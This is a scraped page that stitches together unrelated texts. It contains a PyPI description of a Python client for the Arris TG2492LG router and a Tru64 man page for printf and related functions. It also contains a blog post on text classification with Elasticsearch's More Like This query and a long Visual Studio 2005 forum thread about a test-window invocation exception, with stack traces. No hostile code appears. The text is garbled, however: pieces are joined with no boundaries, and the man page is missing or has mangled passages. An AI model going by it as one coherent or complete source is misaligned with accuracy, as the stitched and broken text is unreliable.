Python client for the Arris TG2492LG Project description Arris TG2492LG Python client A unofficial Python client for retrieving information from the Arris TG2492LG router. The Arris TG2492LG is one of two routers that Ziggo, a cable operator in the Netherlands, provides to their customers as Ziggo Connectbox. The current functionality is limited to retrieving a list of devices that are connected to the router. Usage List all connected devices: from arris_tg2492lg import ConnectBox connectBox = ConnectBox("", "password") devices = connectBox.get_connected_devices() print(devices) Please note that the list of connected devices include devices that are offline (e.g. just went out of range of the wifi). The Device class contains a property online that can be checked. An example for retrieving a list of the MAC addresses of all online device is included in the examples folder: python3 list_online_devices.py --host --password <password> Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/arris-tg2492lg/
CC-MAIN-2021-17
refinedweb
164
55.34
Content-type: text/html printf, fprintf, sprintf - Print formatted output Standard C Library (libc.so, libc.a) #include <stdio.h> int printf( const char *format [,value]...); int fprintf( FILE *stream, const char *format [,value]...); int sprintf( char *string, const char *format [,value]...); Interfaces documented on this reference page conform to industry standards as follows: fprintf(), printf(), sprintf(): ISO C, XPG4, XPG4-UNIX Refer to the standards(5) reference page for more information about industry standards and associated tags. Specifies a character string combining literal characters with conversion specifications. Specifies the data to be converted according to the format parameter. Points to a FILE structure specifying an open stream to which converted values will be written. Points to a character array in which the converted values will be stored. The printf() function converts, formats, and writes its value parameters, under control of the format parameter, to the standard output stream stdout. The fprintf() function converts, formats, and writes its value parameters, under control of the format parameter, to the output stream specified by the stream parameter. The sprintf() function converts, formats, and stores its value parameters, under control of the format parameter, into consecutive bytes starting at the address specified by the string parameter. The sprintf() function places a null character \0 at the end. You must ensure that enough storage space is available to contain the formatted string. The format parameter is a character string that contains two values. The e, E, f, and g formats represent the special floating-point values as follows: +NaNQ or -NaNQ +NaNS or -NaNS +INF or -INF +0 or -0 The representation of the + (plus sign) depends on whether the + or (space) formatting flag is specified. All forms of the printf() functions allow for the insertion of a language-dependent radix character in the output string. The radix character is defined by langinfo data in the program's locale (category LC_NUMERIC). In the POSIX (C) locale, or in a locale where the radix character is not defined, the radix character defaults to . (period). The st_ctime and st_mtime fields of the file are marked for update between the successful execution of the printf() or f bytes in the output string. Otherwise, a negative value is returned. The value returned by the sprintf() function does not include the final '\0' (null) character. The printf() or fprintf() functions fail if either stream is unbuffered or stream's buffer needed to be flushed and the function call caused an underlying write() or lseek() function to be invoked. In addition, if the printf() or fprintf() function fails, errno is set to one of the following values:. An invalid wide character was detected. The read operation was interrupted by a signal that was caught, and no data was transferred. The implementation supports job control; the process is a member of a background process group and is: conv(3), ecvt(3), putc(3), scanf(3), vprintf(3), vwprintf(3), wprintf(3), wscanf(3) delim off
http://backdrift.org/man/tru64/man3/fprintf.3.html
CC-MAIN-2017-22
refinedweb
494
54.22
return to main index The python scripts presented here are intended to illustrate some of the tasks that Rifs can perform. The reader should review the tutorial RfM: Batch Filtering before continuing with this tutorial. Using the batchRenderRI() proc with Maya (see RfM: Batch Rendering) a Rif or Rifs may be specified as follows. batchRenderRI("rif_it", 1); or batchRenderRI("rif_it.Rif(), 1"); The second arg indicates whether "rman genrib" should be used to generate a fresh set of ribs. If only the name of module is specified then ribops.py assumes the name of the class is 'Rif'. Therefore, rif_it is considered to be the same as rif_it.Rif(). Multiple Rifs can be specified as follows. rif_it rif_it.Rif() batchRenderRI("rif_it;rif_meshToBlobby(0.5)"); Note the use of a semi-colon to separate the names of the Rifs. Spaces must not appear anywhere within the double quotations. String arguments must be specified with single quotes ie. batchRenderRI("rif_it;rif_shadinginterpolation('smooth'), 1"); The first Rif edits the Display statement of a rib so that a deep image file is saved to disk - suitable for deep compositing in Nuke. For example, batchRenderRI("rif_deepimage.Rif(), 1"); would convert a Display statement such as, Display "renderman/first/images/first.0003.iff" "mayaiff" "rgba" to Display "renderman/first/images/first.0003.dtex" "deepshad" "rgba" Listing 1 (rif_deepimage.py) import prman, os class Rif(prman.Rif): def Display(self, name, driver, channels, params): if driver != 'shadow' and driver != 'deepshad' and driver != 'null': driver = 'deepshad' name = os.path.splitext(name)[0] name = name + '.dtex' self.m_ri.Display(name, driver, channels) else: self.m_ri.Display(name, driver, channels, params) The third Rif converts a "standard" blobby produced by, say, a Maya particle emitter to a blobby that can be rendered as a volume primitive. A typical Maya/RfM rib archive that defines a standard Blobby primitive will look like this, ##RenderMan RIB version 3.04 Blobby 3 [1001 0 1001 16 1001 32 0 3 0 1 2] [1 0 0 0 0 1 0 0 0 0 1 0 -0.5 0.2 0.0 1 1 0 0 0 0 1 0 0 0 0 1 0 0.9 0.5 0.0 1 1 0 0 0 0 1 0 0 0 0 1 0 0.5 -0.5 0.0 1] [""] When rendered the Blobby would appear as shown in figure 2. But when converted to a volume primitive and rendered with an appropriate surface shader it will look completely different - figure 3. Figure 2 A standard Blobby Figure 3 A Volume Blobby A Blobby can be rendered as a volume primitive if its sequence of opcodes begin with 8. Blobby 3 [8 1001 0 1001 16 1001 32 0 3 0 1 2] ...transformation data... Currently RMS (version 3) does not provide a convenient way of specifying a Blobby as a volume primitive. The Rif shown in listing 3 adds the required opcode. Listing 3 (rif_volumeblobby.py) import prman class Rif(prman.Rif): def Blobby(self, numblobs, opcodes, xyz, strs, params): opcodes = (8,) + opcodes self.m_ri.Blobby(numblobs, opcodes, xyz, strs, params) The next Rif converts all polymeshes, specified in a rib by the PointsGeneralPolygons statement, to a Blobby. Figure 4 shows the appearance of a mesh in Maya and how it might appear in the final image. PointsGeneralPolygons Blobby Listing 4 (rif_meshToBlobby.py) import prman class Rif(prman.Rif): def __init__(self, ri, scale): self.scale = float(scale) prman.Rif.__init__(self, ri) def PointsGeneralPolygons(self, nloops, nverts, verts, params): opcodes = [] numblobs = len(params['P'])/3 for n in range(numblobs): opcodes.append(1001) opcodes.append(n * 16) opcodes.append(0) # blending code opcodes.append(numblobs)# blend all blobs for n in range(numblobs): opcodes.append(n) # indices of the blobs to blend common = (self.scale,0,0,0,0,self.scale,0,0,0,0,self.scale,0) transforms = (self.scale,0,0,0,0,self.scale,0,0,0,0,self.scale,0) xyz = params['P'] numxyz = len(xyz) for n in range(0, numxyz, 3): pos = (xyz[n], xyz[n+1], xyz[n+2]) if n == 0: transforms = common + pos + (1,) else: transforms = transforms + common + pos + (1,) params = {} strs = ('',) self.m_ri.Blobby(numblobs,opcodes,transforms, strs, params) Figure 4 PointsGeneralPolygons converted to a Blobby This Rif changes the diameter (constantwidth) of the points defined by the rib Points statement. Notice in this example the Points() method receives two inputs, num_points and params, but the call to the base class, self.m_ri.Points(params), outputs only one argument. Points Listing 5 (rif_points_width.py) import prman class Rif(prman.Rif): def __init__(self, ri, width): self.width = (width,) prman.Rif.__init__(self, ri) def Points(self, num_points, params): # two args in params['constantwidth'] = self.width self.m_ri.Points(params) # one arg out This Rif reads the xyz locations of the points defined by the rib Points statement and outputs an archive at each location. Listing 6 (rif_points_archive.py) import prman class Rif(prman.Rif): def __init__(self, ri, archive_path): self.archive_path = archive_path prman.Rif.__init__(self, ri) def Points(self, num_points, params): if self.archive_path != '': coords = params['P'] for n in range(0, num_points, 3): x = coords[n] y = coords[n+1] z = coords[n+2] self.m_ri.TransformBegin() self.m_ri.Translate(x,y,z) self.m_ri.ReadArchive(self.archive_path) self.m_ri.TransformEnd() else: self.m_ri.Points(params) Figure 5 Regular Points Figure 6 Points replaced by archives
http://fundza.com/rfm/rif_examples1/index.html
CC-MAIN-2017-04
refinedweb
907
60.51
. When I stumbled across Elasticsearch for the first time, I was fascinated by its ease of use, speed and configuration options. Every time I worked with it, I found an even simpler way to achieve what I was used to solve with traditional Natural Language Processing (NLP) tools and techniques. At some point I realized that it can solve a lot of things out of the box that I was trained to implement from scratch. Most NLP tasks start with a standard preprocessing pipeline: - Gathering the data - Extracting raw text - Sentence splitting - Tokenization - Normalizing (stemming, lemmatization) - Stopword removal - Part of Speech tagging Some NLP tasks such as syntactic parsing require deep linguistic analysis. For this kind of tasks Elasticsearch doesn't provide the ideal architecture and data format out of the box. That is, for tasks that go beyond token-level, custom plugins accessing the full text need to be written or used. But tasks such as classification, clustering, keyword extraction, measuring similarity etc. only require a normalized and possibly weighted Bag of Words representation of a given document. Steps 1 and 2 can be solved with the Ingest Attachment Processor Plugin (before 5.0 Mapper Attachments Plugin) in Elasticsearch. Raw text extraction for these plugins is based on Apache Tika, which works on the most common data formats (HTML/PDF/Word etc.). Steps 4 to 6 are solved with the language analyzers out of the box. Sample-Mapping: { "properties":{ "content":{ "type":"text", "analyzer":"german" } } } If the mapping type for a given field is "text" (before 5.0: "analyzed string") and the analyzer is set to one of the languages natively supported by Elasticsearch, tokenization, stemming and stopword removal will be performed automatically at index time. So no custom code and no other tool is required to get from any kind of document supported by Apache Tika to a Bag of Words representation. The language analyzers can also be called via REST API, when Elasticsearch is running. curl -XGET "" -d' { "text" : "This is a test." }' { "tokens":[ { "token":"test", "start_offset":10, "end_offset":14, "type":"<ALPHANUM>", "position":3 } ] } The non-Elasticsearch approach looks like this: Gathering the text with custom code, document parsing by hand or with the Tika library, using a traditional NLP library or API like NLTK, OpenNLP, Stanford NLP, Spacy or anything else which has been developed in some research department. However, tools developed at research departments are usually not very useful for an enterprise context. Very often the data formats are proprietary, the tools need to be compiled and executed on the command line, and the results are very often simply piped to standard out. REST APIs are an exception. With the Elasticsearch language analyzers, on the other hand, you only need to configure your mapping and index the data. The pre-processing happens automatically at index time. Traditional approach to text classification Text classification is a task traditionally solved with supervised machine learning. The input to train a model is a set of labelled documents. The minimal representation of this would be a JSON document with 2 fields: "content" and "category" Traditionally, text classification can be solved with a tool like SciKit Learn, Weka, NLTK, Apache Mahout etc. Creating the models Most machine learning algorithms require a vector space model representation of the data. The feature space is usually something like the 10,000 most important words of a given dataset. How can the importance of a word be measured? Usually with TF-IDF. This is a formula that has been invented in the 70ies of the last century. TF-IDF is a weight that scores a term within a given document relative to the rest of the dataset. If a term in a document has a high TF-IDF score it means that it is a very characteristic keyword and distinguishes a document from all other documents by means of that word. The keywords with the highest TF-IDF scores in a subset of documents can represent a topic. For text classification a feature space with the n words with the highest overall TF-IDF scores is quite common. Each document is converted to a feature vector, then with all training instances for each class/category a model is created. After that new documents can be classified according to this model. Therefore the document needs to be converted to a feature vector and from there all similarities are computed. The document will be labelled with the category with the highest score. Text Classification with Elasticsearch All the above can be solved in a much simpler way with Elasticsearch (or Lucene). You just need to execute 4 steps: - Configure your mapping ("content" : "text", "category" : "keyword") - Index your documents - Run a More Like This Query (MLT Query) - Write a small script that aggregates the hits of that query by score PUT sample POST sample/document/_mapping { "properties":{ "content":{ "type":"text", "analyzer":"english" }, "category":{ "type":"text", "analyzer":"english", "fields":{ "raw":{ "type":"keyword" } } } } } POST sample/document/1 { "category":"Apple (Fruit)", "content":." } POST sample/document/2 { "category":"Apple (Company)", "content":." } The MLT query is a very important query for text mining. How does it work? It can process arbitrary text, extract the top n keywords relative to the actual "model" and run a boolean match query with those keywords. This query is often used to gather similar documents. If all documents have a class/category label and a similar number of training instances per class this is equivalent to classification. Just run a MLT query with the input document as the like-field and write a small script that aggregates score and category of the top n hits. GET sample/document/_search { "query":{ "more_like_this":{ "fields":[ "content", "category" ], "like":.", "min_term_freq":1, "max_query_terms":20 } } } This sample is only intended to illustrate the workflow. For real classification you will need a bit more data. So don't worry if with that example you won't get any actual result. Just add more data and it works. And here's a little Python script that processes the response and returns the most likely category for the input document. from operator import itemgetter def get_best_category(response): categories = {} for hit in response['hits']['hits']: score = hit['_score'] for category in hit['_source']['category']: if category not in categories: categories[category] = score else: categories[category] += score if len(categories) > 0: sortedCategories = sorted(categories.items(), key=itemgetter(1), reverse=True) category = sortedCategories[0][0] return category And there is your Elasticsearch text classifier! Use cases Classification of text is a very common real world use case for NLP. Think of e-commerce data (products). Lots of people run e-commerce shops with affiliate links. The data is provided by several shops and often comes with a category tag. But each shop has another category tag. So the category systems need to be unified and hence all the data needs to be re-classified according to the new category tree. Or think of a Business Intelligence application where company websites need to be classified according to their sector (hairdresser vs. bakery etc). Evaluation I evaluated this approach with a standard text classification dataset: The 20 Newsgroups dataset. The highest precision (92% correct labels) was achieved with a high quality score threshold that included only 12% of the documents. When labelling all documents (100% Recall) 72% of the predictions were correct. The best algorithms for text classification on the 20 Newsgroups dataset are usually SVM and Naive Bayes. They have a higher average accuracy on the entire dataset. So why should you consider using Elasticsearch for classification if there are better algorithms? There are a few practical reasons: training an SVM model takes a lot of time. Especially when you work in a startup or you need to adapt quickly for different customers or use cases that might become a real problem. So you may not be able to retrain your model every time your data changes. I experienced it myself working on a project for a big German bank. Hence you will work with outdated models and those will for sure not score that good anymore. With the Elasticsearch approach training happens at index time and your model can be updated dynamically at any point in time with zero downtime of your application. If your data is stored in Elasticsearch anyway, you don't need any additional infrastructure. With over 10% highly accurate results you can usually fill the first page. In many applications that's enough for a first good impression. Why then use Elasticsearch when there are other tools? Because your data is already there and it's going to pre-compute the underlying statistics anyway. It's almost like you get some NLP for free! Saskia Vola studied Computational Linguistics at the University of Heidelberg and started working in the field of text mining in 2009. After a few years in the Berlin startup scene she decided to become a fulltime freelancer and enjoy the life as a Digital Nomad. As she received more and more relevant project offers, she decided to start a platform for NLP/AI freelancers called textminers.io
https://www.elastic.co/blog/text-classification-made-easy-with-elasticsearch
CC-MAIN-2020-29
refinedweb
1,515
54.02
I realise this has been asked many times already, but I've just come from FOUR other threads with similar titles, tried what they said, and couldn't get it to work. I have a script attached to an empty Game Object (with box collider attached). I want to instantiate a terrain piece as a child of the object. So far I have: var tile; tile = Instantiate (fHigh1, Vector3(r, 0, c), transform.rotation); tile.transform.parent = this; A multitude of different errors pop up with every combination I try. I've also tried: tile.transform.parent = transform; tile.transform.parent = Transform; tile.Transform.parent = transform; tile.Transform.parent = Transform; tile.transform.this = transform; Help please :( Answer by fafase · Jan 31, 2013 at 08:26 AM I would think your error is there: tile.transform.parent = this; 'this' represents the script not the object. try tile.transform.parent = transform; The code below works for me (in C#): public class Script : MonoBehaviour { public GameObject tile; void Start () { GameObject obj = (GameObject)Instantiate(tile,new Vector3(0,0,0),Quaternion.identity); obj.transform.parent =transform; } } Note: Since you are using UnityScript, if you have #pragma strict at the top var tile; should be var tile:GameObject; #pragma strict var tile; var tile:GameObject; var tile : GameObject ; tile = Instantiate (fHigh1, Vector3(r, 0, c), transform.rotation); Throws error: "BCE0022: Cannot convert 'UnityEngine.Transform' to 'UnityEngine.GameObject'." And as you read above, I already tried: With no success. :( Perhaps it is in fact: but I have to fix the other issue first? Also, I don't know C# yet. XD You may have different type of variables, so to make it simple just make them all GameObject: var obj:GameObject; var tile:GameObject; function Start () { tile = Instantiate(obj,Vector3(0,0,0),Quaternion.identity); tile.transform.parent =transform; } I did what you said and played: InvalidCastException: Cannot cast from source type to destination type. tileCollider.OnTriggerEnter (UnityEngine.Collider other) (at Assets/Scripts/tileCollider.js:57) :( A preview: var tile : GameObject; var fHigh1 : GameObject; function OnTriggerEnter ( other : Collider ) { r = other.transform.position.x; c = other.transform.position.z; if ( other.gameObject.name == "fHigh1") { tile = Instantiate (fHigh1, Vector3(r, 0, c), Quaternion.identity); } tile.transform.parent = transform; } Note the other.gameObject.name is referring to a DIFFERENT "fHigh1". Getting instance of an sub object rather than the original's subobject 0 Answers Creating new Transform from existing objects Transform to Instantiate object 1 Answer Make a simple tree 1 Answer Instantiating a new gameObject as a child of a different gameObject 2 Answers Instantiate prefab as Child to remove and re-do later 2 Answers
https://answers.unity.com/questions/390996/instantiate-terrain-object-as-child-of-empty-game.html
CC-MAIN-2020-05
refinedweb
438
50.23
Represents a path from a specific derived class (which is not represented as part of the path) to a particular (direct or indirect) base class subobject. More... #include "clang/AST/CXXInheritance.h" Represents a path from a specific derived class (which is not represented as part of the path) to a particular (direct or indirect) base class subobject. Individual elements in the path are described by the CXXBasePathElement structure, which captures both the link from a derived class to one of its direct bases and identification describing which base class subobject is being used. Definition at line 70 of file CXXInheritance.h. Definition at line 82 of file CXXInheritance.h. References Access, and clang::AS_public. Referenced by clang::CXXBasePaths::clear(). The access along this inheritance path. This is only calculated when recording paths. AS_none is a special value used to indicate a path which permits no legal access. Definition at line 75 of file CXXInheritance.h. Referenced by clang::Sema::CheckBaseClassAccess(), and clear(). The declarations found inside this base class subobject. Definition at line 80 of file CXXInheritance.h.
https://clang.llvm.org/doxygen/classclang_1_1CXXBasePath.html
CC-MAIN-2021-17
refinedweb
179
50.94
Answered by: Exception has been thrown by the target of an invocation - Hi, (VS 2005, Beta 2) I get the error "Exception has been thrown by the target of an invocation" when I try to open any of the test windows using "Test|Windows|Test View" or any similar approach. I created a new solution a while ago and added some unit tests. Everything was working great, until now... Anybody have any suggestions? Thanks, Tor LangloMonday, May 30, 2005 4:14 PM Question Answers - All replies - I assume this is not just for your solution, and is across all projects?Tuesday, May 31, 2005 5:55 PM No, that's not correct. Today I created a new solution, and was able to add unit tests, and the tests show up in the Test View. My guess is something has gotten corrupted in the other solution. I've been doing a bit of renaming in it (namespaces, assemblies, directories), maybe this is the cause of the problem. I'll try to figure it out later. Tor.Wednesday, June 01, 2005 7:44 AM - I wouldn't worry that you have a corrupted solution or installation. This particular exception usually indicates a missing assembly reference. That is, at some point an assembly in team system referenced another assembly that wasn't in memory and could not be located. Did you install the Team Foundation client with VSTS? Does the problem you reported occur if you launch the IDE and don't load any solution whatsoever? Does the problem still repro if you load the original solution? MichaelTuesday, June 07, 2005 1:55 PM - I think you might be on to something here with the namespace/assembly renaming. I do remember seeing at least one existing bug in Beta 2 related to errors caused by renamed assemblies and namespaces. I've also experienced unhandled exception pain related to connecting to multiple separate TF server installations with Beta 2 because of a known cache bug (the first one you connect to would get cached, but in a way that would corrupt your ability to access a second distinct TF server installation). The nastiness of this particular error message is that it doesn't give you much useful troubleshooting information other than the environment context you can remember from before it happened. But I guess I should refrain from digressing into the tester version of Grumpy Old Programmer ( ) :) If you do get some time to figure this out and get it isolated please keep the feedback coming with your repro steps, etc. Your participation really is making a difference, links to these forum posts are added right there in the work item tracking system so it is a nice communications channel for us. --- Eric Jarvi, June 07, 2005 3:24 PM Hi, If you are successfully creating and working with TV in a fresh project/solution, it sounds like something in the project or solution is broken. What we have experienced is this error when the solution file CPU-flavour references become corrupted (mostly from moving Solution files from old versions of whidbey). 1: Open the .sln file in notepad 2: Change All References to"AnyCPU" (note the missing space) to "Any CPU" 3: Save 4: Open the solution again Yours, DominicTuesday, June 07, 2005 5:17 PM - Unfortunately I had my harddisk crash on Friday, and the project(s) where I experienced the error were lost (at least temorarily until I know whether the disk can be rescued). I'll keep my eyes open, and report here if I can reproduce the problem. Thanks for all feedback, Tor.Tuesday, June 07, 2005 5:36 PM - I'm currently experiencing this problem. I have not yet found the source of the problem or a work-around, but, in my case, the problem is related to a deployment project that was added as the ninth project in a solution which contains a web site and several other projects for the application. If I remove the deployment project from the solution, the Manage and Execute Tests interface will appear and the list of tests will populate, but, when I add it back in, I either receive the error the original poster reported, or no error and an empty test list. If I find the source of the problem, I will report back here.Wednesday, June 08, 2005 12:19 AM - I've been having the exact same problem. For me, the problem started when I added a Web Deployment Project into my solution. The solution has: Data Class libraries (in their own project) Business Class libraries (in their own project) Web Site Unit Test project Web Deployment project When I go to the "Manage and Execute Tests" menu item, I get "Exception has been thrown by the target of an invocation." Using SourceSafe to check "what changed" between the version that worked, and the one that didn't, the answer turned out to be the Web Deployment project. I can: 1 - Launch VS.NET 2005 Beta 2 2 - Click on "Manage and Execute Tests" and get the exception 3 - Remove the Deployment project from the solution 4 - Click on "Manage and Execute Tests" and have it work. (No restarting of VS.NET 2005 needed in the above 4 steps). I did try reporoducing this in a new solution, but was unable to get a similar failure. -- Chris MullinsWednesday, June 08, 2005 8:59 PM If a "Web Setup Project" Deployment project exists within your solution, the "Manage and Execute Tests" feature will not work properly. I will submit a bug report after posting this message. Here are the steps to reproduce the problem: 1. Start Visual Studio 2005 Beta 2. 2. Create a new Visual Basic Windows Application Project, allowing Visual Studio to create a solution for the project at creation time. It is not necessary to add the project or solution to source control. 3. Close the default form opened after the project has been created. 4. Add a new "Test Project" project to the solution (in the Add New Project Window, select "Test Projects", then "Test Documents", then "Test Project".) 5. Close the two default test project windows. 6. Do a "Save All". 7. Close the solution. 8. Open the solution. 9. Select "Manage and Execute Tests" from the Test menu. 10. In the Test Manager window, observe the three default test list options in the upper-left pane ("Lists of Tests", Tests Not in a List" and "All Loaded Tests") 11. In the Test Manager window, click "Tests Not in a List" and observe the presence of the two default entries in main content pane of the Test Manager window, "manualtest1" and "TestMethod1". 12. In the Test Manager window, click "All Loaded Tests" and observe the presence of the two default entries in main content pane of the Test Manager window, "manualtest1" and "TestMethod1". 13. Close the Test Manager Window. 14. Add a new "Web Setup Project" project to the solution (in the Add New Project Window, select "Other Project Types", then "Setup and Deployment", then "Web Setup Project".) 15. Close the default "File System (ProjectName)" window. 16. Do a "Save All". 17. Close the solution. 18. Open the solution. 19. Select "Manage and Execute Tests" from the Test menu. 20. You will either receive the "Exception has been thrown by the target of an invocation" error, or you will see the Test Manager window. 21. If you see the Test Manager window, continue with the following steps. 22. In the Test Manager window, note the absence of the three default test list options ("Lists of Tests", Tests Not in a List" and "All Loaded Tests"), in the upper-left pane of the Test Manager window. 23. In the Test Manager window, note the absence of the two previously visible default tests, "manualtest1" and "TestMethod1". 24. Do a "Save All". 25. Close the solution. 26. Open the solution. 27. Remove the "Web Setup Project" Deployment Project from the solution. 28. Do a "Save All". 29. Close the solution. 30. Open the solution. 31. Select "Manage and Execute Tests" from the Test menu. 32. In the Test Manager window, observe the three default test list options in the upper-left pane ("Lists of Tests", Tests Not in a List" and "All Loaded Tests") 33. In the Test Manager window, click "Tests Not in a List" and observe the presence of the two default entries in main content pane of the Test Manager window, "manualtest1" and "TestMethod1". 34. In the Test Manager window, click "All Loaded Tests" and observe the presence of the two default entries in main content pane of the Test Manager window, "manualtest1" and "TestMethod1".Thursday, June 09, 2005 7:00 PM - I've reported this as a bug, and it is currently being reviewed. The bug ID is FDBK29360. Bug URL:, June 09, 2005 7:39 PM - Thank you very much for reporting the bug. I have checked that this bug has already been fixed for the RTM version of the product. The only known workaround is to remove the setup project for the solution. Sorry for the inconvenience caused. Thanks! WinnieThursday, June 09, 2005 8:27 PM - I had a similar problem with a Sql Server Integration Services Project in my solution.. by Unloading the solution, i could again Manage and View the Tests. I had also deleted the .vsmdi and .testrunconfig files from the solution... although i'm not sure if it was needed, so vs.net would generate new ones (I had to delete them via explorer, as vs.net wouldn't let me)Wednesday, June 15, 2005 4:09 AM - - ok, well. it seems that all i needed to do is leave it along for 30minutes and it worked. No joke. I think my computer is evoluting. =D Maybe it will make my code for me!! =) Tuesday, June 28, 2005 5:08 PM - yes deleting the .vsmdi and testrunconfig doesn't do anything.. i encoutnered the error once again when i added a Deployment project (.msi). it seems that the error in vs.net is related to the test manager/system trying to parse/read/analyse certain types of Projects. when i removed the deployment project from the solution, it all worked againFriday, July 01, 2005 5:25 AM - for what its worth, heres my 2 cents: i had this same error a bit after i added a setup project to my solution. i didnt fix it by removing it, instead i found out that the problem was something else: before i got the error, i propertied the setup project release folder to be shared to my home network so i could install it on the other pc. seems that un-sharing this folder fixed the error. thanks for all the ones who replied to this post, somewhere in page 1 i remember i got the idea of unsharing from one of the posts which i cant remember right now. enjoyMonday, April 17, 2006 11:17 PM Hi All, In my UI Layer I am raising the Exception Divisible by Zero. In Catch block of UI Layer I am calling the Business layer function to write this exception into Event Viewer After the Exception writes into the Event viewer the control come back to UI Layer of Catch block. When I am getting the error like “Exception has been thrown by the target of an invocation.” If you know the solution for this problem, please reply to this mail. I am using .Net 2.0, Application Block 2.0 and XP Professional See the Following Code Business Layer public interface ICommonFunctions { void LogErrInToFile(Exception ex); } public class CommonFunctions : MarshalByRefObject, ICommonFunctions { public bool LogErrInToFile(Exception ex) { bool boolError = ExceptionPolicy.HandleException(ex, "ExceptionPolicy"); } } UI Layer try { int i = 1; int j = 0; int k = i / j; } catch (Exception ex) { bool boolError = objCF.LogErrInToFile(ex); //Error occurs after the control comes from Business layer. } finally { } Error System.Reflection.TargetInvocationException was unhandled Message="Exception has been thrown by the target of an invocation." Source="mscorlib" StackTrace: Server stack trace:.Soap.ObjectReader.Deserialize(HeaderHandler handler, ISerParser serParser) at System.Runtime.Serialization.Formatters.Soap.SoapFormatter.Deserialize(Stream serializationStream, HeaderHandler handler) at System.Runtime.Remoting.Channels.CoreChannel.DeserializeSoapResponseMessage(Stream inputStream, IMessage requestMsg, Header[] h, Boolean bStrictBinding) at System.Runtime.Remoting.Channels.SoapClientFormatterSink.DeserializeMessage(IMethodCallMessage mcm, ITransportHeaders headers, Stream stream) Thames.OSS.Interfaces.ICommonFunctions.LogErrInToFile(Exception ex) at OSSThickClientProject.ProfileManagement.profileManagement_Load(Object sender, EventArgs e) in D:\GISADS3\OSSThickClientProject\ProfileManagement.cs:line 63.SendMessage(HandleRef hWnd, Int32 msg, Int32 wParam, Int32 lParam) OSSThickClientProject.Program.Main() in D:\GISADS3\OSSThickClientProject() Thanks in advance. Regards Rajaram.Friday, July 14, 2006 5:05 AM - Thnx buddy, I was facing the same problem while inovation of objects by using reflection and i found de correct solution.Monday, July 09, 2007 9:32 AM - Hi guys, i'm having the same problem when adding an access db connection in server explorer. any ideas on this? thanks, daveFriday, September 14, 2007 1:38 AM Hi I got the same error "Exception has been thrown by the target of an invocation" when I run my solution under windows 2000. But when I run this solution on a pc running windows xp work fine. Actually my VB6 COM object have three parameter and one of them is long some how it doesn't work in windows 2000. After spending time on it I passed all three parameters as string and it worked . Here is my code that now worked on both 2000 and XP. windows 2000 machine has only .Net framework 1.1 XP machine has .Net framework 1.1 and 2.0 but I make this solution in .Net 1.1 DimlStatus As Long Dim lTaskKey As Long DimobjParam As Object ReDimobjParam(2) lTaskKey= 15694 objParam(0) = lTaskKey.ToString() ' When I pass ItaskKey as long it gives an error on windows 2000 objParam(1) = "XYZ" objParam(2) = "Server2" ' Late binding wayDim objType As Type DimobjObject As Object objType = Type.GetTypeFromProgID("HR.Task") ' HR.Task is a VB6 COM objObject = Activator.CreateInstance(objType) lStatus = objType.InvokeMember("GetStatus", System.Reflection.BindingFlags.InvokeMethod, System.Type.DefaultBinder, objObject, objParam) I hope this will help to some one. thxSaturday, October 20, 2007 5:39 AM I'm having the sam problem Im using VB in VS 2005. The code is: 'This event is fired on the background thread mobjQueueReader =New STARWorkFileListener.cWrkFleListener AddHandler mobjQueueReader.UpdateThreads, AddressOf Me.UpdateTextBox mobjQueueReader.StartListening(sCN) It compiles with no problem but errs on the Addhandler the full message is: System.Reflection.TargetInvocationException was unhandled by user code Message="Exception has been thrown by the target of an invocation." Source="mscorlib" StackTrace:.EnterpriseServices.ComponentSerializer.UnmarshalFromBuffer(Byte[] b, Object tp) at System.EnterpriseServices.ComponentServices.ConvertToMessage(String s, Object tp) at System.EnterpriseServices.ServicedComponent.RemoteDispatchHelper(String s, Boolean& failed) at System.EnterpriseServices.ServicedComponent.System.EnterpriseServices.IRemoteDispatch.RemoteDispatchNotAutoDone(String s) at System.EnterpriseServices.IRemoteDispatch.RemoteDispatchNotAutoDone(String s) at System.EnterpriseServices.RemoteServicedComponentProxy.Invoke(IMessage reqMsg) at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type) at System.Object.FieldSetter(String typeName, String fieldName, Object val) at STARWorkFileListener.frmWrkFileListener.Worker_DoWork(Object sender, DoWorkEventArgs e) in C:\Galaxy\Services\File Listener\STARWorkFileListener\frmWrkFileListener.vb:line 359 at System.ComponentModel.BackgroundWorker.OnDoWork(DoWorkEventArgs e) at System.ComponentModel.BackgroundWorker.WorkerThreadStart(Object argument) Any Ideas what I may have missed? ThanksTuesday, December 18, 2007 6:36 PM I am using VS2008 SP1 on x86 Vista If you have any help for this problem, please email to reprisethelung@live.com or just post on this discussion. Thank you very much for any time anybody puts into it. I Have been having the same problem, but only after I did the following: 1. Installed VS2008 SP1 (.NET 3.5) 2. Installed the Silverlight 2.0 SDK 3. Then I created a VB.sln (for Silverlight)and played around with a Silverlight 2.0 project in VB/xaml/html/javascript/aspx and everything was working great. 4. Then I tried to create a new .sln for a new C# Silverlight project, but got a message saying "C# compiler could not be created" And was not be able to creat any C# .sln, including a C# Console Application. 5. Upon encoutering that problem, I did some searching and discoverd "Devenv.exe" After running that, used "devenv.exe /ResetSkipPkgs", and then I was able to create all the types of C# .sln's. 6. I only get that message (posted below) in the design view while developing Silverlight apps in either C# or VB. However, by clicking the 'Click here to reload designer', with one or two clicks, it usually goes away. The only reason I post this is because the messages are scary, and it bugs me that something horribly wrong could be going on with Visual Studio. The software costed soooo much, and I care about the health of it. I reallize I am at fault for not researching "devenv.exe /ResetSkipPkgs" before entering it or trying to find all solutions to my compiler problem. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - THE MESSAGE THAT POPS UP IN DESIGN VIEW - - - - - - - - - - - - - - - - - - - - - - - - - - - - - An unhandled exeption has occured: Details: MS.Internal.Package.MetadataLoader.InitializeProfileMetadata(RegistryKey registryRoot, String profile, LogCallback logger) at MS.Internal.Designer.VSIsolatedDesigner.VSIsolatedDesignerFactory.CreateDesigner(DesignerContext context) at MS.Internal.Host.Isolation.IsolatedDesigner.BootstrapProxy.CreateDesigner(IsolatedDesignerFactory factory, IDesignerContextProtocol contextProtocol) at MS.Internal.Host.Isolation.IsolatedDesigner.BootstrapProxy.CreateDesigner(IsolatedDesignerFactory factory, IDesignerContextProtocol contextProtocol) at MS.Internal.Host.Isolation.IsolatedDesigner.Load() at MS.Internal.Designer.DesignerPane.LoadDesignerView() Could not load type 'System.Windows.Controls.WebBrowser' from assembly 'PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'. at 